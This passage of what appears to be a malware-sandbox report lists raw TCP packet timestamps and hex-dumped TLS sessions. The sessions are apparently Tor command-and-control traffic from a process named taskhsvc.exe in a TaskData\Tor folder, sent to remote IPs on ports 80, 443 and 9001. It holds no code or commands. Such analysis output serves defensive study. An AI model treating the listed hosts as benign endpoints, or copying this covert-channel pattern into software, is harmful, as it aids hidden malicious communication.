                                Jan 31, 2023 16:15:09.625781059 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.625792027 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.625803947 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.625814915 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.625844002 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.625855923 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.625859022 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.625859022 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.625874996 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.625886917 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.625897884 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626091003 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.626125097 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626138926 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626219034 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.626251936 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626266003 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626277924 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626288891 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626301050 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626329899 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626342058 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626354933 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626367092 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626379013 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626470089 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626485109 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626497030 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626507998 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626519918 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626524925 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.626554012 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626564980 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626575947 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626585960 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626596928 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626606941 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626617908 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626629114 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626640081 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.626693010 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.627032042 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.627228022 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.627242088 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.627346039 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.627360106 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.627371073 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.627382040 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.627464056 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.627477884 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.627542019 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.627634048 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.627634048 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.627634048 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.627826929 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.628766060 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.628983021 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.630019903 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630130053 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630142927 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630251884 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630265951 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630366087 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.630382061 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630394936 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630405903 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630415916 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630426884 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630438089 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630451918 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630462885 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630472898 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630484104 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630494118 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630505085 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630516052 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630526066 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630537033 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.630639076 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630652905 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630664110 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630673885 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630685091 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630696058 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.630899906 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.631068945 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.631223917 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631254911 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631264925 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631275892 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631287098 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631297112 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631354094 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631365061 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631376028 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631386042 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631397009 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631407022 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631455898 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631459951 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.631567001 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631577969 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.631654024 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.631654024 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.631969929 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.653141975 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.653467894 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.654028893 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654278994 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.654423952 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654441118 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654562950 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654581070 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654685020 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654701948 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654716015 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654730082 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654743910 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654755116 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.654767990 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654782057 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654794931 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654808998 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654823065 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654836893 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654850006 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654864073 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654876947 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654891014 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654903889 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654917955 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.654923916 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.654923916 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.654939890 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.655138016 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.655138016 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.655179977 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.655196905 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.655210972 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.655302048 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.655424118 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.655489922 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.655534029 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.655613899 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.655627966 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.655642986 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.655657053 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.655659914 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.655659914 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.655679941 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.655694008 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.655831099 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.655998945 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.667725086 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.671636105 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.695166111 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.723124027 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.735743999 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.586042881 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:10.628479958 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.628494978 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.628599882 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.628611088 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.628681898 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:10.628837109 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:10.669636011 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.669732094 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.669744015 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.669754982 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.669774055 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.669785023 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.669998884 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:10.711045027 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.711122036 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.711214066 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.711299896 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.711373091 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.711429119 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.711460114 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:10.711477995 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:10.711637974 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:10.711637974 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:10.711637974 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:10.711781025 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:10.754190922 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:10.791790009 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:12.089081049 CET49825443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:15:12.089104891 CET4434982592.205.17.93192.168.11.20
                                Jan 31, 2023 16:15:12.089320898 CET49825443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:15:12.432401896 CET49825443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:15:12.432415962 CET4434982592.205.17.93192.168.11.20
                                Jan 31, 2023 16:15:12.483428001 CET4434982592.205.17.93192.168.11.20
                                Jan 31, 2023 16:15:12.483643055 CET49825443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:15:12.485656023 CET49825443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:15:12.485667944 CET4434982592.205.17.93192.168.11.20
                                Jan 31, 2023 16:15:12.485918045 CET4434982592.205.17.93192.168.11.20
                                Jan 31, 2023 16:15:12.486207008 CET49825443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:15:12.528346062 CET4434982592.205.17.93192.168.11.20
                                Jan 31, 2023 16:16:12.774328947 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:16:12.818734884 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:17:18.993396997 CET4434982395.130.11.147192.168.11.20
                                Jan 31, 2023 16:19:38.775679111 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:19:38.775944948 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:19:38.776004076 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:19:38.817449093 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:20:12.656817913 CET49825443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:12.657130957 CET4434982592.205.17.93192.168.11.20
                                Jan 31, 2023 16:20:12.657283068 CET49825443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:20.032535076 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.151076078 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:20.151355028 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.155153036 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.273361921 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:20.274147034 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:20.275746107 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.394481897 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:20.394968987 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.513988018 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:20.514089108 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:20.514333010 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.514643908 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.674307108 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:30.075015068 CET49853443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:30.075122118 CET4434985392.205.17.93192.168.11.20
                                Jan 31, 2023 16:20:30.075364113 CET49853443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:30.075700045 CET49853443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:30.075764894 CET4434985392.205.17.93192.168.11.20
                                Jan 31, 2023 16:20:30.149938107 CET4434985392.205.17.93192.168.11.20
                                Jan 31, 2023 16:20:30.150202990 CET49853443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:30.152154922 CET49853443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:30.152187109 CET4434985392.205.17.93192.168.11.20
                                Jan 31, 2023 16:20:30.152885914 CET4434985392.205.17.93192.168.11.20
                                Jan 31, 2023 16:20:30.153834105 CET49853443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:30.196357012 CET4434985392.205.17.93192.168.11.20

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.11.2049824171.25.193.980C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                TimestampkBytes transferredDirectionData
                                Jan 31, 2023 16:15:09.036135912 CET251OUTData Raw: 16 03 01 00 d9 01 00 00 d5 03 03 b9 3b a6 6a f4 a8 8c 13 57 d4 00 e4 ab de 58 2b 27 b8 29 1e 40 02 e2 ca 71 24 6f 0f 0f fa 32 fb 00 00 30 c0 2b c0 2f c0 0a c0 09 c0 13 c0 14 c0 12 c0 07 c0 11 00 33 00 32 00 45 00 39 00 38 00 88 00 16 00 2f 00 41
                                Data Ascii: ;jWX+')@q$o20+/32E98/A5|#!www.235x5ejqnf5u5a7ciaqnp3.com#
                                Jan 31, 2023 16:15:09.079245090 CET252INData Raw: 16 03 03 00 39 02 00 00 35 03 03 c8 95 80 24 bd 31 d4 e2 bf 67 32 48 68 0e ff 4d e9 e3 0b 46 0b 54 03 a1 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 0d ff 01 00 01 00 00 0b 00 04 03 00 01 02 16 03 03 02 4c 0b 00 02 48 00 02 45 00 02 42 30 82 02 3e 30
                                Data Ascii: 95$1g2HhMFTDOWNGRD/LHEB0>0`Ov70*H010Uwww.4q6pmet4726j.com0220729000000Z230605000000Z0 10Uwww.s54baamrkeltm.net0"0*H0
                                Jan 31, 2023 16:15:09.081216097 CET252OUTData Raw: 16 03 03 00 46 10 00 00 42 41 04 70 e3 dd 7f 14 1b c5 3e 82 44 c0 0a db 82 b3 ba 0a b8 6b 87 6b 35 2c f8 c9 6b 06 bb a9 04 25 44 26 7d 6c 54 46 f6 6a 1c 29 67 36 6a 7f 01 eb 7a f0 39 fe ba 32 11 b9 d4 90 61 2d 09 7d 17 b8 49 14 03 03 00 01 01 16
                                Data Ascii: FBAp>Dkk5,k%D&}lTFj)g6jz92a-}I(Nr/aFQZ]P%U+O
                                Jan 31, 2023 16:15:09.122889996 CET252INData Raw: 14 03 03 00 01 01 16 03 03 00 28 51 95 a4 a9 4a 58 4a ca 4a 35 b8 95 bd 87 dd 41 91 bf ca 19 62 f8 30 b9 77 af a8 2f db 90 d2 12 8e 70 66 72 8b ae 92 e8
                                Data Ascii: (QJXJJ5Ab0w/pfr
                                Jan 31, 2023 16:15:09.123358965 CET252OUTData Raw: 17 03 03 00 21 ea 4e 03 ef 72 2f e5 62 b7 26 23 95 e6 5c ba 97 a4 b3 21 83 e0 a3 8e ce 2c eb 82 a8 21 ff fe 31 da
                                Data Ascii: !Nr/b&#\!,!1
                                Jan 31, 2023 16:15:09.165112019 CET254INData Raw: 17 03 03 08 02 51 95 a4 a9 4a 58 4a cb bf c1 dd 8e 80 9c e8 d8 29 4e 14 dc 24 5a cc da f3 5a 35 a8 f9 2a 43 d0 21 07 98 f4 c0 3b bc 05 ab 82 ab 2f bc de 5b 5a bc bd ea da 7b 41 72 a5 ff 01 a9 e3 03 4f c4 cc 60 d1 53 eb 73 1b 53 b3 a5 b3 84 18 d4
                                Data Ascii: QJXJ)N$ZZ5*C!;/[Z{ArO`SsSs[yIRMv/h9_R{A<`q<?[,9feA[;<McS;n>W+XR($Kgcfg70+-!SW'W[[o[
                                Jan 31, 2023 16:15:09.165216923 CET254INData Raw: 16 9e 93 62 77 a1 63 bf e4 44 f0 e9 21 44 14 23 ed 54 49 57 4b 04 00 c5 03 5e 02 6a cc 47 09 93 cc ef f5 95 24 53 7c bf 92 e9 95 f5 91 28 3c e5 d8 10 78 33 65 fe 67 f2 65 aa ab 44 a5 47 c1 21 5c 51 23 2b 8d aa 48 c7 e8 b5 de 02 b2 bb 70 5e b0 f8
                                Data Ascii: bwcD!D#TIWK^jG$S|(<x3egeDG!\Q#+Hp^dT[VKpX`l2;]AVI;l6V>m^YD+VJ?sW"~lLPzUX$tBhP%J}jb*Jf,>a{ayLr
                                Jan 31, 2023 16:15:09.217772961 CET256OUTData Raw: 17 03 03 04 1c ea 4e 03 ef 72 2f e5 63 4a bf c3 0c 06 85 80 e5 6e 69 3c 34 ba 9c cb 6f 84 66 e4 40 bf 09 2a b5 2e 8e 6e 5f 7e e8 2d 60 21 70 ac 05 96 f4 11 8b 2f 94 c0 ac d3 7e d0 97 9e 59 67 4d 3a 3a c7 af 74 3f c7 15 4c 14 fa a3 c4 28 6b 40 35
                                Data Ascii: Nr/cJni<4of@*.n_~-`!p/~YgM::t?L(k@5ulD1V )yXYv*.,`\qk~M.D4IP+b(}Zw*Hbi;gK~2Xp1x?s[.4hpw`,i`gm#
                                Jan 31, 2023 16:15:09.260479927 CET256INData Raw: 17 03 03 02 1a 51 95 a4 a9 4a 58 4a cc 73 06 9e 17 a0 35 f9 39 b5 63 3c 17 6b 7a 89 c9 b6 37 98 17 af 37 7d 82 5c f2 66 c9 07 a8 f6 ff 7a 76 d0 6c 5f b6 c6 5c be 78 be 5a b2 1f 73 6a 1c b3 8c ce f3 09 a5 12 08 f7 cb 1a 54 2c 64 9e dc 04 79 cd f3
                                Data Ascii: QJXJs59c<kz77}\fzvl_\xZsjT,dyhnd!PH>{j!I^`JZGyMJcw|7 9& O1mP,.+xy|L^)2[mXU/Vijpv-. T
                                Jan 31, 2023 16:15:09.261230946 CET257OUTData Raw: 17 03 03 04 1c ea 4e 03 ef 72 2f e5 64 d0 d3 13 4e 75 65 e9 b3 11 8b 28 3e 5b 83 d9 39 4f a3 51 59 de ed f5 c0 54 2b 84 2c 41 bb 34 dc 62 a1 ac d6 51 8d 9a a0 51 2c b8 46 eb 97 d3 1d 8e 98 4b 4b 3f d3 6a 54 1b 04 2f 18 30 df 49 90 6a f1 d4 1f e4
                                Data Ascii: Nr/dNue(>[9OQYT+,A4bQQ,FKK?jT/0Ij512J<(gu24s2\XW9 cOf=Ui-e[_8DY<&Xb\6Bg(-+[~eU#zWA}Q
                                Jan 31, 2023 16:15:09.303674936 CET259INData Raw: 17 03 03 0f e8 51 95 a4 a9 4a 58 4a cd 7e 38 52 b3 e8 a6 ef 62 8b 9d 0b ee 44 00 70 43 c7 79 2d a4 e4 24 4d 58 34 54 34 48 fe c5 2d 22 4a d1 b8 41 df 26 69 94 7f 67 55 f5 17 9e 69 30 be 55 ab 86 e8 99 be 81 19 b7 0e d3 9e 1a b4 0a a7 fb a8 4c c9
                                Data Ascii: QJXJ~8RbDpCy-$MX4T4H-"JA&igUi0UL@2j>6ZUKIkm`1;v(,DWTm]iz(,}/j67G=TWx<1W|E^+uF=c=Pel_Lp\0`Y^
                                Jan 31, 2023 16:15:09.303761959 CET260INData Raw: 53 1c 87 c6 be 69 a0 6f fb ef 56 ef 4a a1 7b 3e be 02 bf 77 40 6f 94 0e 6a 0b ba 18 c8 2d b9 b1 07 1a 46 d7 94 70 dd 5d be c7 19 0d d0 e9 a2 19 41 27 b3 f3 35 b9 df 8b a5 f0 d5 c4 81 4e 8e 7d 1b af 1d f5 be 38 d9 40 ce 6e 04 3a 4e d5 67 bd 14 77
                                Data Ascii: SioVJ{>w@oj-Fp]A'5N}8@n:Ngw"4!y'<OGk~o=4>G`8xwQ0b}nl?ngIaknaw9YLMNIaw%CSIwOs>R))|e
                                Jan 31, 2023 16:15:09.303828001 CET261INData Raw: 69 08 73 6a 4a 59 a3 1f 36 43 b2 24 00 d4 75 7e e3 da 7d 19 ad e5 fe 54 ef f1 9b 35 fc 8e d9 69 b1 f4 34 e0 0b 70 ff 50 88 ea 13 37 06 79 6a 6e 5e 19 2a a1 0b 61 df 8e 29 17 29 cc 61 60 49 e8 d5 d7 5c e8 84 be 4c 23 06 e3 a2 4d 7c 0b 41 2f dc f4
                                Data Ascii: isjJY6C$u~}T5i4pP7yjn^*a))a`I\L#M|A/=`HN@l^ytDEa<vmr03&GdQ^OtdJ@,B:2dP$E,pd8~*IqS6r`w{t76;t|
                                Jan 31, 2023 16:15:09.303870916 CET261INData Raw: fe 54 69 2d 12 a7 19 26 39 82 48 d5 3b 0e 17 27 d3 81 d3 25 dd 74 de 32 18 26 94 44 94 72 49 cc ee 1e 7a ae f4 bf ec 72 dc 49 ce f1 30 e7 9c 39 e7 a2 b8 16 4f 62 16 0a 87 be c1 27 01 d8 92 05 68 bf ac 60 21 97 9f 44 0a 52 43 21 64 42 4e 68 a5 70
                                Data Ascii: Ti-&9H;'%t2&DrIzrI09Ob'h`!DRC!dBNhp&>0nhO?p=L*Hn}zKg/^LRNXNI;Ju;(xET{fY?S&)pKO@r'%'UK
                                Jan 31, 2023 16:15:09.303932905 CET263INData Raw: 17 03 03 0f e8 51 95 a4 a9 4a 58 4a ce 2e bc c3 e3 15 dc fb cb 77 ad 38 11 c7 b1 78 45 0c f2 8c 61 e6 bf 20 c1 45 ac 7d f2 45 b3 8d 5e e9 ce 60 97 6f ce 65 55 1f 5c df b1 94 b6 02 72 5f a4 83 74 bc e4 db 52 0b 68 62 50 ef de 2b 0b 79 b6 f2 25 5f
                                Data Ascii: QJXJ.w8xEa E}E^`oeU\r_tRhbP+y%_XUw5shfQi+*7+`z)Ux1j:SF+/IluAV>U[80G8S//oE@6 ST{I<crGEBSTY4#<teyg
                                Jan 31, 2023 16:15:09.347186089 CET297OUTData Raw: 17 03 03 02 1a ea 4e 03 ef 72 2f e5 65 27 10 39 96 8f 91 4d 07 29 4e 15 fd a5 cc 44 0f 78 e4 f7 a8 fd fc 13 28 25 2c 4d 0f a1 0f 45 74 0d a7 ca c3 4c 45 7a 9e 77 6b 4e 7a 7c a0 a1 3d 37 76 f4 fd 30 42 15 23 90 c8 07 82 e2 02 70 9f 03 54 26 00 e9
                                Data Ascii: Nr/e'9M)NDx(%,MEtLEzwkNz|=7v0B#pT&mI!,AH?JnRlSW?Bqf5Z9&i~U>[tX8*7KJQ3`Y5<xV4|.4rsZQAj_F}lj._/,e7&T
